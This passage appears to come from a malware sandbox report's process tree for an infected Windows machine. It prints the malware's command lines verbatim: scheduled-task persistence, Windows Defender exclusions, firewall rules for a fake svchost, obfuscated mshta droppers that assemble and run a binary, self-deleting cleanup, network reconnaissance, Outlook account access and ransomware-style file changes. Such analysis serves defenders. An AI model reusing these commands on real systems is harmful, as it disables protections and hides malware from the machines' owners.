- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
PID:4456
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4972 -
C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"3⤵
- Executes dropped EXE
PID:4256
-
-
C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"3⤵
- Executes dropped EXE
PID:3816
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1hlySlP9nisX71mJnP5mZ3Qa.exe"C:\Users\Admin\Pictures\Adobe Films\1hlySlP9nisX71mJnP5mZ3Qa.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2176 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2112
-
-
-
C:\Users\Admin\Pictures\Adobe Films\kMqKKP_wvgeIt3GAmkhy0_7l.exe"C:\Users\Admin\Pictures\Adobe Films\kMqKKP_wvgeIt3GAmkhy0_7l.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4632
-
-
C:\Users\Admin\Pictures\Adobe Films\EWVAtHTOXdt0DAYRA3GEQBur.exe"C:\Users\Admin\Pictures\Adobe Films\EWVAtHTOXdt0DAYRA3GEQBur.exe"2⤵
- Executes dropped EXE
PID:300 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 6563⤵
- Program crash
PID:2620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 6683⤵
- Program crash
PID:3640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 6723⤵
- Program crash
PID:4872
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 8123⤵
- Program crash
PID:3256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 10483⤵
- Program crash
PID:3136
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 11403⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4092
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ZuWzpISe9wfUgG8mQ9ORonH1.exe"C:\Users\Admin\Pictures\Adobe Films\ZuWzpISe9wfUgG8mQ9ORonH1.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1060
-
-
C:\Users\Admin\Pictures\Adobe Films\YLPxR1bFWYWLGzK0QEMH4Yaa.exe"C:\Users\Admin\Pictures\Adobe Films\YLPxR1bFWYWLGzK0QEMH4Yaa.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:592 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵PID:1508
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:1744
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:4700
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
PID:5720
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:5768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵PID:5360
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:2748
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:5024
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\EF78.exeC:\Users\Admin\AppData\Local\Temp\EF78.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2496 -
C:\Users\Admin\AppData\Local\Temp\EF78.exeC:\Users\Admin\AppData\Local\Temp\EF78.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:344
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "_eKJw2OFuLijigALN0RShv0q" /sc ONLOGON /tr "'C:\Windows\Tasks\_eKJw2OFuLijigALN0RShv0q.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2192
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RqcBdtquQCGLaKIMXJSNd_ZL" /sc ONLOGON /tr "'C:\odt\RqcBdtquQCGLaKIMXJSNd_ZL.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2372
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "aoWnOtt3BnvpIQ5LuYSMKmgs.tmp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4052
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "9NDwiPlZEEhDGlkz9gl0UQAX" /sc ONLOGON /tr "'C:\Users\Admin\Pictures\Adobe Films\FmIprFPSFzOTXlcTeprUC6YU\9NDwiPlZEEhDGlkz9gl0UQAX.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2300
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:896
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "aoWnOtt3BnvpIQ5LuYSMKmgs.tmp" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\is-KM2OK.tmp\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4484
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1828
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:968
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3644
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3512
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:4656
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5072
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6056
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\142D.exeC:\Users\Admin\AppData\Local\Temp\142D.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3688
-
C:\Users\Admin\AppData\Local\Temp\3E6B.exeC:\Users\Admin\AppData\Local\Temp\3E6B.exe1⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5804
-
C:\Users\Admin\AppData\Local\Temp\727C.exeC:\Users\Admin\AppData\Local\Temp\727C.exe1⤵
- Suspicious use of SetThreadContext
PID:5128 -
C:\Users\Admin\AppData\Local\Temp\727C.exeC:\Users\Admin\AppData\Local\Temp\727C.exe2⤵
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:1528 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\727C.exe"3⤵PID:5288
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
PID:5520
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\945D.exeC:\Users\Admin\AppData\Local\Temp\945D.exe1⤵PID:4408
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\C36D.dll1⤵PID:2232
-
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\C36D.dll2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
PID:5412 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe3⤵PID:2160
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn ddqdlcbnv /tr "regsvr32.exe -s \"C:\Users\Admin\AppData\Local\Temp\C36D.dll\"" /SC ONCE /Z /ST 10:46 /ET 10:584⤵
- Creates scheduled task(s)
PID:3196
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D725.exeC:\Users\Admin\AppData\Local\Temp\D725.exe1⤵
- Suspicious use of SetThreadContext
PID:5632 -
C:\Users\Admin\AppData\Local\Temp\D725.exeC:\Users\Admin\AppData\Local\Temp\D725.exe2⤵
- Adds Run key to start application
PID:5360 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:5616
-
-
C:\Users\Admin\AppData\Local\Temp\D725.exe"C:\Users\Admin\AppData\Local\Temp\D725.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Suspicious use of SetThreadContext
PID:5264 -
C:\Users\Admin\AppData\Local\Temp\D725.exe"C:\Users\Admin\AppData\Local\Temp\D725.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Modifies extensions of user files
PID:2372 -
C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe"C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe"5⤵
- Suspicious use of SetThreadContext
PID:1996 -
C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe"C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe"6⤵PID:5464
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:4304
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10A4.exeC:\Users\Admin\AppData\Local\Temp\10A4.exe1⤵PID:4992
-
C:\Users\Admin\AppData\Local\Temp\new.exe"C:\Users\Admin\AppData\Local\Temp\new.exe" -update "10A4.exe"2⤵PID:5348
-
C:\Users\Admin\AppData\Local\Temp\10A4.exe"C:\Users\Admin\AppData\Local\Temp\10A4.exe" -updated3⤵
- Adds Run key to start application
PID:4792 -
C:\Users\Admin\AppData\Roaming\Absolute\module.exe"C:\Users\Admin\AppData\Roaming\Absolute\module.exe"4⤵PID:5044
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\new.exe"3⤵PID:5196
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30004⤵
- Runs ping.exe
PID:2904
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2084.exeC:\Users\Admin\AppData\Local\Temp\2084.exe1⤵PID:1368
-
C:\Users\Admin\AppData\Local\Temp\32E4.exeC:\Users\Admin\AppData\Local\Temp\32E4.exe1⤵
- Loads dropped DLL
- Checks processor information in registry
PID:4792 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 32E4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\32E4.exe" & del C:\ProgramData\*.dll & exit2⤵PID:6112
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 32E4.exe /f3⤵
- Kills process with taskkill
PID:6108
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:6100
-
-
-
C:\Users\Admin\AppData\Local\Temp\4F56.exeC:\Users\Admin\AppData\Local\Temp\4F56.exe1⤵PID:4132
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\4F56.exe"" > ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF """" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\4F56.exe"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ))2⤵PID:5468
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\4F56.exe"> ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\4F56.exe") do taskkill -iM "%~Nxq" -f3⤵PID:5404
-
C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw4⤵PID:1860
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"" > ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF ""/PvqsV6~7fsyUR14GhQkS4jjgPQTPw"" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ))5⤵PID:740
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"> ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "/PvqsV6~7fsyUR14GhQkS4jjgPQTPw" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE") do taskkill -iM "%~Nxq" -f6⤵PID:5012
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCripT: ClOSe (creAteObJecT( "WscrIpT.sheLl" ). RUN ( "cmd /q /c ECho %tImE%4u> VDn3614.Q9 &ECho | SET /p = ""MZ"" > WSyZI.4 & coPY /b /y WSYZI.4 + 0CPM7.G + TY6DSS.SE + vDN3614.Q9 ..\UfTh.2~z& STaRt msiexec -y ..\UFTH.2~Z & deL /q * ",0 , tRUe ) )5⤵PID:5148
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c ECho %tImE%4u> VDn3614.Q9 &ECho | SET /p = "MZ" > WSyZI.4& coPY /b /y WSYZI.4+ 0CPM7.G+ TY6DSS.SE+ vDN3614.Q9 ..\UfTh.2~z& STaRt msiexec -y ..\UFTH.2~Z & deL /q *6⤵PID:3704
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECho "7⤵PID:5024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>WSyZI.4"7⤵PID:5436
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -y ..\UFTH.2~Z7⤵
- Loads dropped DLL
PID:5760
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "4F56.exe" -f4⤵
- Kills process with taskkill
PID:3328
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\586F.exeC:\Users\Admin\AppData\Local\Temp\586F.exe1⤵PID:5752
-
\??\c:\windows\system32\regsvr32.exeregsvr32.exe -s "C:\Users\Admin\AppData\Local\Temp\C36D.dll"1⤵PID:2232
-
C:\Windows\SysWOW64\regsvr32.exe-s "C:\Users\Admin\AppData\Local\Temp\C36D.dll"2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
PID:5228 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4368 -
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /t REG_DWORD /v "C:\ProgramData\Microsoft\Omaeirficyei" /d "0"4⤵PID:956
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /t REG_DWORD /v "C:\Users\Admin\AppData\Roaming\Microsoft\Pumao" /d "0"4⤵PID:5568
-
-
C:\Windows\SysWOW64\whoami.exewhoami /all4⤵PID:6832
-
-
C:\Windows\SysWOW64\cmd.execmd /c set4⤵PID:1796
-
-
C:\Windows\SysWOW64\arp.exearp -a4⤵PID:6580
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:6188
-
-
C:\Windows\SysWOW64\net.exenet view /all4⤵
- Discovers systems in the same network
PID:6964
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP4⤵PID:6104
-
-
C:\Windows\SysWOW64\net.exenet share4⤵PID:6544
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share5⤵PID:6596
-
-
-
C:\Windows\SysWOW64\route.exeroute print4⤵PID:6492
-
-
C:\Windows\SysWOW64\netstat.exenetstat -nao4⤵
- Gathers network information
PID:6912
-
-
C:\Windows\SysWOW64\net.exenet localgroup4⤵PID:6996
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup5⤵PID:7120
-
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe -s "C:\ProgramData\Microsoft\Omaeirficyei\ewdvnymudi.dll"4⤵
- Suspicious behavior: MapViewOfSection
PID:6868 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6520
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:3084 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:500
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"3⤵
- Creates scheduled task(s)
PID:3024
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:4212
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:5804 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:5780
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:5540 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:4372
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:5376 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:792
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:5488
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:4792 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:6072
-
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:6012
-
C:\Users\Admin\AppData\Roaming\ghdhvtsC:\Users\Admin\AppData\Roaming\ghdhvts1⤵
- Suspicious use of SetThreadContext
PID:400 -
C:\Users\Admin\AppData\Roaming\ghdhvtsC:\Users\Admin\AppData\Roaming\ghdhvts2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:224
-
-
C:\Users\Admin\AppData\Roaming\rvdhvtsC:\Users\Admin\AppData\Roaming\rvdhvts1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:904
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies registry class
PID:5672
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:1200 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:520
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6232
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:6392 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:6564
-
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:6608
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:4048
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:7076 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:5712
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:7112 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:7080
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies registry class
PID:6000
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:7084 -
